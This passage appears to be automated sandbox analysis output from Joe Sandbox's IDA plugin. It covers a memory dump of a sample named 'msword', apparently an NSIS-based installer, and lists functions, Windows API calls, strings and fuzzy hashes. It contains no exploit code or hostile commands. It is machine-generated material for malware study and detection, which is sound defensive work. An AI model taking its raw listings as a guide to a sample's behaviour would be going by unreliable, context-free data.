CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A47,?), ref: 00405E76

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction ID: fe2e31f24f36ecb58ba6038de6e4569557e5a61990f2f31681ab57118d472e11
Opcode Fuzzy Hash: 6f817a4f04f8c8cc68f88398dd52813d28edb2112aa12cde00d29204b34f1fbe
Instruction Fuzzy Hash: BCD09E71554202EFEF098F60DE1AF6EBBA2FB94B00F11852CB292550F0DAB25819DB15

Function 00405E30 Relevance: 3.0, APIs: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,00406E81,?,?,?), ref: 00405E34
SetFileAttributesW.KERNEL32(?,00000000), ref: 00405E47

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction ID: a99f375bd2b1051765f890e1d94d2f722c1bb1ba0a12d38356d8610c0186b9c0
Opcode Fuzzy Hash: 404706a0ec70c465fc6e77d3f379a59e81a865ab84cdc077efcd7274a0164b66
Instruction Fuzzy Hash: 84C01272404800EAC6000B34DF0881A7B62AB90330B268B39B0BAE00F0CB3488A99A18

Function 00403336 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,004033CE,000000FF,00000004,00000000,00000000,00000000), ref: 0040334D

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction ID: a3bc5d39330dd194e4c7332763fdc94ca13499671d705f1c19c6925397c50364
Opcode Fuzzy Hash: 1a43d381f500bc8dc9f00bbbc079669c25ab728c1eaf5fecfa5fd6a2526f4c39
Instruction Fuzzy Hash: C8E08C32550118BFCB109EA69C40EE73B5CFB047A2F00C832BD55E5290DA30DA00EBE8

Function 004037CC Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

CreateDirectoryW.KERNELBASE(004D70C8,00000000,004D70C8,004D70C8,004D70C8,-00000002,00403A0B), ref: 004037ED

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Char$Next$CreateDirectoryPrev
String ID:
API String ID: 4115351271-0
Opcode ID: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction ID: 8ea1286759415c6f695425ed34242866ebe8a7a529327a4e56f2759b30593fc1
Opcode Fuzzy Hash: df63d9f6fb0dfe925f434423aee030f478bab57ed52ac2db2f8962d9fd449c2e
Instruction Fuzzy Hash: B1D0A921083C3221C562332A3D06FCF090C8F2635AB02C07BF841B61CA8B2C4B8240EE

Function 00403DAF Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction ID: 301fa2329b67e93c742f3c195cb428e9759bf169fd062939fd541a9b7e119014
Opcode Fuzzy Hash: 203c4a4104ade6b46efc04414fb016ca35add41c2a64233918ece76cb1940256
Instruction Fuzzy Hash: D3C04C71650601AADA108B509D45F1677595B50B41F544439B641F50E0D674E450DA1E

Function 00403368 Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040375A,?,?,?,?,00000000,00403A47,?), ref: 00403376

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction ID: da19c3e449f5d10d282cbd9bcc1d8f2f369397d5e390659c1e8fea63e82898b0
Opcode Fuzzy Hash: ff5c9719b5bb24227ed98436e19d1f66b73f6b097333bfca9e4e1763c30da83c
Instruction Fuzzy Hash: 0CB09231140204AEDA214B109E05F067A21FB94700F208824B2A0380F086711420EA0C

Function 00403D98 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000028,?,00000001,004057B4), ref: 00403DA6

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction ID: f61ffac979fbda5733e9df3da2bdae5977773398d3d4f9e0d67d11d125479468
Opcode Fuzzy Hash: 8ef0c84af5b69eb6e5c04aecb335cbd5d798096170d60dc049d97623b8df0028
Instruction Fuzzy Hash: EFB09235181A00AADE614B00DF0AF457A62A764701F008079B245640B0CAB200E0DB08

Function 00403D85 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,0040574D), ref: 00403D8F

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction ID: d14db2bc66c636a64d409f7b36464c270e9f3e97be8c2f7aaa1954d4611ec3db
Opcode Fuzzy Hash: 7b5b3f07ec4b69a7f183f6b544b36b38adf2938630adbd4e30d083ffe7510c70
Instruction Fuzzy Hash: 8DA01275005500DBCF014B40EF048067A61B7503007108478F1810003086310420EB08

Non-executed Functions

Function 0040497C Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 470windowmemoryCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F9), ref: 00404993
GetDlgItem.USER32(?,00000408), ref: 004049A0
GlobalAlloc.KERNEL32(00000040,?), ref: 004049EF
LoadBitmapW.USER32(0000006E), ref: 00404A02
SetWindowLongW.USER32(?,000000FC,Function_000048CC), ref: 00404A1C
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A2E
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A42
SendMessageW.USER32(?,00001109,00000002), ref: 00404A58
SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A64
SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A74
DeleteObject.GDI32(?), ref: 00404A79
SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AA4
SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404AB0
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B51
SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404B74
SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B85
GetWindowLongW.USER32(?,000000F0), ref: 00404BAF
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BBE
ShowWindow.USER32(?,00000005), ref: 00404BCF
SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CCD
SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D28
SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D3D
SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D61
SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404D87
ImageList_Destroy.COMCTL32(?), ref: 00404D9C
GlobalFree.KERNEL32(?), ref: 00404DAC
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E1C
SendMessageW.USER32(?,00001102,?,?), ref: 00404ECA
SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404ED9
InvalidateRect.USER32(?,00000000,00000001), ref: 00404EF9
ShowWindow.USER32(?,00000000), ref: 00404F49
GetDlgItem.USER32(?,000003FE), ref: 00404F54
ShowWindow.USER32(00000000), ref: 00404F5B

Strings

@, xrefs: 00404B90
M, xrefs: 00404B43
N, xrefs: 00404C06
, xrefs: 00404F39

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $ @$M$N
API String ID: 1638840714-3479655940
Opcode ID: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction ID: e2b6c32447eba08f07ab18e4c0942225b167af9b9c7e550a0b0592367213937f
Opcode Fuzzy Hash: 222e44079ed98782fbb34ec8da515d99173e785f6e02dcb26c66960398e67004
Instruction Fuzzy Hash: 09026CB0900209AFEF209FA4CD45AAE7BB5FB84314F10413AF615B62E1D7B89D91DF58

Function 004044A5 Relevance: 33.6, APIs: 15, Strings: 4, Instructions: 300stringkeyboardCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003F0), ref: 004044F9
IsDlgButtonChecked.USER32(?,000003F0), ref: 00404507
GetDlgItem.USER32(?,000003FB), ref: 00404527
GetAsyncKeyState.USER32(00000010), ref: 0040452E
GetDlgItem.USER32(?,000003F0), ref: 00404543
ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404554
SetWindowTextW.USER32(?,?), ref: 00404583
SHBrowseForFolderW.SHELL32(?), ref: 0040463D
lstrcmpiW.KERNEL32(00462540,00447240,00000000,?,?), ref: 0040467A
lstrcatW.KERNEL32(?,00462540), ref: 00404686
SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404696
CoTaskMemFree.OLE32(00000000), ref: 00404648

Part of subcall function 00405C84: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403F81), ref: 00405C97

Part of subcall function 00406038: CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
Part of subcall function 00406038: CharNextW.USER32(?,?,?,00000000), ref: 004060AA
Part of subcall function 00406038: CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
Part of subcall function 00406038: CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Part of subcall function 00403E74: lstrcatW.KERNEL32(00000000,00000000,0046A560,004C70A8,install.log,00405A9C,004C70A8,004C70A8,004D30C0,00447240,80000001,Control Panel\Desktop\ResourceLocale,00000000,00447240,00000000,00000006), ref: 00403E8F

GetDiskFreeSpaceW.KERNEL32(00443238,?,?,0000040F,?,00443238,00443238,?,00000000,00443238,?,?,000003FB,?), ref: 00404759
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404774

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

SetDlgItemTextW.USER32(00000000,00000400,00409264), ref: 004047ED

Strings

A, xrefs: 00404636
82D, xrefs: 004046DB
@%F, xrefs: 00404674
@rD, xrefs: 00404610

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
String ID: 82D$@%F$@rD$A
API String ID: 3347642858-1086125096
Opcode ID: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction ID: 5c5d6a603380bcdbc7d7d35b60f5621b43697e5e98684918e033f9398a36e476
Opcode Fuzzy Hash: 41223eded68e0cc8c9bf9fa9bd2dae48608aba550ad56c91da83586f0d18507e
Instruction Fuzzy Hash: D1B1A4B1900209BBDB11AFA1CD85AAF7AB8EF45314F10847BF605B72D1D77C8A41CB59

Function 00406ED2 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 270filestringCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406EF6
ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F30
ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FA9
lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FB5
lstrcmpA.KERNEL32(name,?), ref: 00406FC7
CloseHandle.KERNEL32(?), ref: 004071E6

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

name, xrefs: 00406FBF
%s: failed opening file "%s", xrefs: 00406F0C
GetTTFNameString, xrefs: 00406F07

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
String ID: %s: failed opening file "%s"$GetTTFNameString$name
API String ID: 1916479912-1189179171
Opcode ID: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction ID: 34713ba181b26839f7619e948cf229fd8716e5ee99c03f3e8673f79b0d3e70cf
Opcode Fuzzy Hash: c1ee4f9d51a5711eefddbfc324bacbf89cb8dd321db642bada23a62a27e44b0a
Instruction Fuzzy Hash: 9091BF70D1412DAACF04EBA5DD909FEBBBAEF48301F00416AF592F72D0E6785A05DB64

Function 00406C9B Relevance: 29.9, APIs: 9, Strings: 8, Instructions: 190filestringCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,004C30A0), ref: 00406CB8
lstrcatW.KERNEL32(0045C918,\*.*,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D09
lstrcatW.KERNEL32(?,00408838,?,0045C918,?,-00000002,004D70C8,?,004C30A0), ref: 00406D29
lstrlenW.KERNEL32(?), ref: 00406D2C
FindFirstFileW.KERNEL32(0045C918,?), ref: 00406D40
FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E22
FindClose.KERNEL32(?), ref: 00406E33

Strings

Delete: DeleteFile("%s"), xrefs: 00406DBC
Delete: DeleteFile on Reboot("%s"), xrefs: 00406DE0
Delete: DeleteFile failed("%s"), xrefs: 00406DFD
RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406E93
RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E58
RMDir: RemoveDirectory failed("%s"), xrefs: 00406EB0
\*.*, xrefs: 00406D03
RMDir: RemoveDirectory("%s"), xrefs: 00406E6F

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*
API String ID: 2035342205-3294556389
Opcode ID: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction ID: 0ca3ec5a28b3c1cae8259a28e21d86b18febecd5c0179aed135e39ed79665852
Opcode Fuzzy Hash: 15be8897d6e9b53d01f132332000c29bcd26e475d5c6b9324dd4f7514e94a53d
Instruction Fuzzy Hash: 2D51E3315043056ADB20AB61CD46EAF37B89F81725F22803FF943751D2DB7C49A2DAAD

Function 00406805 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 212stringCOMMON

Download Yara Rule

APIs

GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6
GetSystemDirectoryW.KERNEL32(00462540,00002004), ref: 00406958

Part of subcall function 00406009: lstrcpynW.KERNEL32(?,?,00002004,004038F1,0046ADC0,NSIS Error), ref: 00406016

GetWindowsDirectoryW.KERNEL32(00462540,00002004), ref: 0040696B
lstrcatW.KERNEL32(00462540,\Microsoft\Internet Explorer\Quick Launch), ref: 004069E5
lstrlenW.KERNEL32(00462540,0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 00406A47

Strings

@%F, xrefs: 00406A53
\Microsoft\Internet Explorer\Quick Launch, xrefs: 004069DF
@%F, xrefs: 0040682C
Software\Microsoft\Windows\CurrentVersion, xrefs: 00406926

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
String ID: @%F$@%F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
API String ID: 3581403547-784952888
Opcode ID: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction ID: 7881bd453c5698e0e02013fa1c3524f2cf467b60749c67c5a59258f73e57ab2a
Opcode Fuzzy Hash: 5b9b76f287d52b653a8a41dc6b1224aada0ccbd74d66441f1f03372adecf381e
Instruction Fuzzy Hash: F171F4B1A00215ABDB20AF28CD44A7E3771EF55314F12C03FE906B62E0E77C89A19B5D

Function 004024FB Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 133comCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(00409B24,?,00000001,00409B04,?), ref: 0040257E

Strings

CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560

Memory Dump Source

Source File: 00000016.00000002.2234631672.0000000000401000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00400000, based on PE: true

Associated: 00000016.00000002.2234607748.0000000000400000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234653660.0000000000408000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000040B000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.000000000041F000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234675664.0000000000461000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000016.00000002.2234750487.00000000004F4000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_400000_msword.jbxd

Similarity

API ID: CreateInstance
String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
API String ID: 542301482-1377821865
Opcode ID: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
Instruction ID: c24c797a6f187c751e7d972b1a807078ee58ffeb38f484aa28d094541f0f6205
Opcode Fuzzy Hash: 0ddbb4256677b6c48083548557f3f7fdb52e2b2de327cf14ae3b1cdcca70b28b
